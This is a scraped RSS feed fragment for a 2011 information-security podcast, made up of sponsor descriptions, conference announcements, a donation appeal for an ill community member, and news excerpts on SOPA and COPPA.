<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Founded twenty seven years ago, Sayers has grown into an industry-leading IT services and solution provider, offering the latest and most sophisticated technologies. Over the past three decades, we have established a powerful track record of success, highly personalized service and lasting client relationships.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies stay with Sayers because we deliver. We create customized, thoughtful solutions to meet their needs &shy; not off-the-shelf approaches, or technology companies do not need. We partner with world-class vendors.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our senior professionals are focused, customer-driven and among the most experienced in the business. Sayers is an independent, minority-owned business committed to our core values and to producing exceptional results for our customers.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="80px;" src="https://lh4.googleusercontent.com/bW95QbS4oopIOUoXaRoFLxEBCgZFyfmnYCOvN-h84LMeBWi7457e9DRk2dj8g0THR3E0jmW_h0OvXnfrrQOq_LvRs1bCQ6O0zcWDaErFtJnF6yt-NLM" width="278px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The WiKID Strong Authentication System is a patented dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens. &nbsp;The WiKID Strong Authentication Server comes as a software appliance, an ISO or in RPM format and works in conjunction with software tokens running on PCs (Windows, Mac, Linux) or smart phone to securely deliver one-time passcodes. &nbsp;WiKID uses public key cryptography allowing greater extensibility and cross-enterprise two-factor authentication without requiring multiple tokens. &nbsp;A trial version of the server is available for download.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="93px;" src="https://lh6.googleusercontent.com/YK8rZErkV28R4qaMqprvrefXOmgLYyvHwVrkfcG6bkkK90RweiB7t45RNCRzcL0Dgi1gofEHmlBHQdKLgGOz4L_mWDBO6cU6nQj0FIpwbZoUPW9sUbE" width="334px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Barracuda Networks Inc. offers industry leading products for three distinct markets. As the worldwide leader in content security appliances, Barracuda Networks offers products that protect organizations from threats over email, Web, and IM. With a strong security heritage, Barracuda Networks offers networking products that improve application delivery and network access with SSL VPN, Internet link load balancing, and server load balancing product lines. Finally, Barracuda Networks offers world-class solutions for backup and data protection that include message archiving, backup software and appliances, and offsite backup services.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="90px;" src="https://lh6.googleusercontent.com/2iHQXZt-hudD6x-00MztpYlisooCVw32fE1Gj_hSfWG67UK2P5TYJaLOcgwJZk7YuBQvVf8h5B4jt6ntQiG0wXD6EUVXkNg0-0jNG_Ajxh1mZsmCCOw" width="344px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NopSec automates cutting-edge hacking tools and techniques to simulate targeted attacks performed by hackers in the real world, and deliver to enterprises an integrated on-demand SaaS platform from the cloud to effectively identify, manage and remediate &ldquo;real&rdquo; exploitable security vulnerabilities. &nbsp;In 2011, NopSec launched the first three modules of VRM solutions, which truly differentiates from existing solutions in multiplicity of attacks, false positive verification and unified vulnerability management framework.</span></p>
<p>					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NopSec delivers security values to its customers via three main service</span><br />
					<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">lines: &nbsp;Risk and Security Assessment Services, &nbsp;NopSec VRM on-demand Vulnerability Risk Management Solution, Security Solutions Implementation Training and Human Component Security Training.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="67px;" src="https://lh3.googleusercontent.com/Q_RJEtAkMaa-QUVOxKtACu7IbpNGCQrPiTi6hsvz6KtXCYpoYQ0sJE5ZczszKO6Cxe5pTcO7uWhclkHJGTFksu7tVH9_8WleJDajLq-YIIUUTf02YQ0" width="246px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stach &amp; Liu provides IT security consulting services to help companies secure their business, networks, and applications. Our team is comprised of industry experts and thought leaders with over 100 years of combined experience.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="83px;" src="https://lh6.googleusercontent.com/9QqqsdxYuf1xN2X-bkFZd9fmKujMsXUgcs--Z3nc4_HCi8qJNBpPvpAKGuEHz1efKwEVB47DM86D03JXU6aRqeybA0ijAaJsjDdZgT3N448_cJYw_e4" width="274px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dell Inc. (NASDAQ: DELL) listens to customers and delivers worldwide innovative technology and business solutions they trust and value. Recognized as an industry leader by top analysts, Dell SecureWorks provides world-class information security services to help organizations of all sizes protect their IT assets, comply with regulations and reduce security costs.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="288px;" src="https://lh3.googleusercontent.com/pKNNEGqAw49yOjI2_G9FZBXFBjr4sTratNxAy1848_aYJNjV43QyeJWm98wvDj_S7J2CmKLDc9tX4UCRKeA1l6hrmwRuyLHDkmb3indlPRgCw3Jsnhg" width="337px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NT OBJECTives (NTO), based in Orange County, California, brings together an innovative collection of top experts in information security and software engineering to develop and provide a comprehensive suite of industry-leading technologies and services to solve the application security challenges of today&#39;s global organizations.</span></td>
</tr>
</tbody>
</table>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-513-live-from-bsidesatl/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3069/0/infosec-daily-podcast-episode-512.mp3" length="34227867" type="audio/mpeg" />
		<itunes:duration>1:11:16</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 512 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, an[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 512 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad Smith theNurse and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	This is a recorded live stream from BSidesLV!

	Sponsors
	To make the very most of this event, we need your help! We currently are looking for sponsors. If you are interested in sponsoring, please contact Nick Owen at nowen at wikidsystems.com or Mary Catherine Petermann at mc at barracuda.com.
	We would like to thank the sponsors that have contributed to this year&#39;s event. Without you these events are not possible. THANK YOU! Our current sponsors include:







*
We&#8217;re a curious bunch that makes digital things &#8212; and not just apps or banners or sites. We bring digital to life with integrated solutions that make sense &#8212; for the companies that need them, the users that demand them and the digital world that consumes them.


*
Amidst the growing noise of polarizing security topics, hacking vs compliance religious warfare, and misunderstood risk phobias, VerSprite provides tailored security guidance that supports technology and operational objectives. &#160;VerSprite reflects a fresh take on understanding and managing risk around people, process, and technology. &#160;Focusing on GRC, AppSec, and BCM solutions, VerSprite&#39;s hybrid approach to InfoSec navigates beyond the super-hyped to a more balanced approach to functional security. Discover more atwww.versprite.com.


*
Milton Security Group LLC (a certified VOSB) was started in 2007 with the basic principle to make Network Security within reach of all businesses. From this basic principle, Milton Security Group has designed and developed a growing suite of security solutions. These solutions are adaptive and tailored to each customer. Milton Security Group approaches security from many angles to bring protection to the core assets of your network. This approach is flexible and allows for a quick response to the latest threats.


*
Rapid7 is the leading provider of security risk intelligence solutions.
					Rapid7&#39;s integrated vulnerability managementhttp://www.rapid7.com/products/vulnerability-management.jsp &#160;and penetration testinghttp://www.rapid7.com/products/penetration-testing.jsp &#160;products, Nexpose and Metasploit, empower organizations to obtain accurate, actionable and contextual intelligence into their threat and risk posture. Rapid7&#39;s solutions are being used by more than 1,700 enterprises and government agencies in more than 65 countries, while the Company&#39;s free products are downloaded more than on[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 511 &#8211; SOPA, COPPA, Security Delegation, IE Decline, Convergence &amp; Anonymous</title>
		<link>http://www.isdpodcast.com/episode-511-sopa-coppa-security-delegation-ie-decline-convergence-anonymous</link>
		<comments>http://www.isdpodcast.com/episode-511-sopa-coppa-security-delegation-ie-decline-convergence-anonymous#comments</comments>
		<pubDate>Fri, 04 Nov 2011 00:52:20 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3064</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 511 for November 3, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith theNurse and his stroke at Hacker Halted: We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 511 for November 3, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith theNurse and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://news.cnet.com/8301-31921_3-20128166-281/copyright-bill-controversy-grows-as-rhetoric-sharpens/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-31921_3-20128166-281/copyright-bill-controversy-grows-as-rhetoric-sharpens/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Stop Online Piracy Act, or SOPA, introduced last week in the House of Representatives to the applause of lobbyists for Hollywood and other large content holders, is designed to make allegedly copyright-infringing Web sites, sometimes called &quot;rogue&quot; Web sites, virtually disappear from the Internet.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That goes too far and hinders freedom of speech and innovation, the Consumer Electronics Association, NetCoalition, and the Computer and Communications Industry Association trade groups said in a letter sent today to House members. SOPA could &quot;constrain economic growth and threaten a vital sector of the U.S. economy and a major source of global competitiveness,&quot; it warned.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Content owners responded a few hours later by publicizing a pair of letters of their own from the National Fraternal Order of Police and the International Association of Fire Fighters. The firefighters&#39; letter was actually written in September and was endorsing a similar-but-not-quite-the-same Senate bill, but its message was unmistakable: &quot;Legislation targeting these foreign rogue Web sites will encourage Internet users to find legitimate sources for goods and content (and) will ensure that counterfeiters and pirates can no longer profit from this clearly illegal activity.&quot;</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://news.cnet.com/8301-19518_3-20127633-238/survey-many-parents-help-kids-lie-to-get-on-facebook"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-19518_3-20127633-238/survey-many-parents-help-kids-lie-to-get-on-facebook</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 1998, Congress passed the Children&#39;s Online Privacy Protection Act (COPPA) that requires Web sites to &quot;obtain verifiable parental consent&quot; before collecting personal information from children under 13.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This very well-intentioned law&#8211;enacted long before the advent of MySpace, Facebook, and other social networks&#8211;was designed to protect children from revealing information that could be used by companies to sell them products or by others to exploit them. Children under 13, according to the Federal Trade Commission, which enforces COPPA, are &quot;particularly vulnerable to overreaching by marketers.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">COPPA doesn&#39;t prevent companies like Facebook from admitting kids under 13, but it does present substantial and expensive roadblocks.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies with services aimed at younger kids, such as Disney&#39;s Club Penguin, have gone to considerable expense to comply with the law. But most companies, including Facebook, MySpace, and Google+, simply block pre-teens from the service. These rules are specified in the companies&#39; terms of service, and companies generally require members to state their birth date. Any child whose date of birth indicates he or she is under 13 is blocked.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other than requiring a birth date, very few services use any other type of age verification tools which, according to the Internet Safety Technical Task Force (which I was on), are largely impractical and can have unintended security and privacy consequences such as the risk of leaking the names and ages of children.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Millions of underage Facebook users</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FTC is currently reviewing COPPA and there is a lot debate, including from some who think it should be liberalized and others who want its protections extended to all teens under 18. But one thing is for sure: millions of children are lying about their age to get around COPPA-related rules. In 2010, I reported on a study commissioned by McAfee that found that 37 percent of 10-to-12-year olds are on Facebook. And this past May, Consumer Reports reported that &quot;of the 20 million minors who actively used Facebook in the past year, 7.5 million were younger than 13&quot; and more than 5 million were younger than 10.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s not just happening in the United States. Even though COPPA is a U.S. law, most companies apply the restrictions globally. The EU Kids Online study from the London School of Economics found that, across Europe, 31 percent of 10-year-olds, 44 percent of 11-year-olds, and 55 percent of 12-year-olds said they used a social network site. Australia&#39;s Daily Telegraph quotes Facebook adviser and former FTC commissioner, Mozelle Thompson, that &quot;Facebook removes 20,000 people a day, people who are underage.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Parents OK with kids lying to create account</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As it turns out, most parents of kids who are lying about their age are aware of what their kids are doing and many parents are actually helping their kids lie to get on Facebook. A peer-reviewed study released today&#8211;&quot;Why Parents Help Their Children Lie to Facebook About Age: Unintended Consequences of the &#39;Children&#39;s Online Privacy Protection Act&#39;&quot;&#8211;(available from FirstMonday.org) found that &quot;many parents knowingly allow their children to lie about their age&#8211;in fact, often help them to do so&#8211;in order to gain access to age-restricted sites in violation of those sites&#39; terms of service.&quot;</span></p>
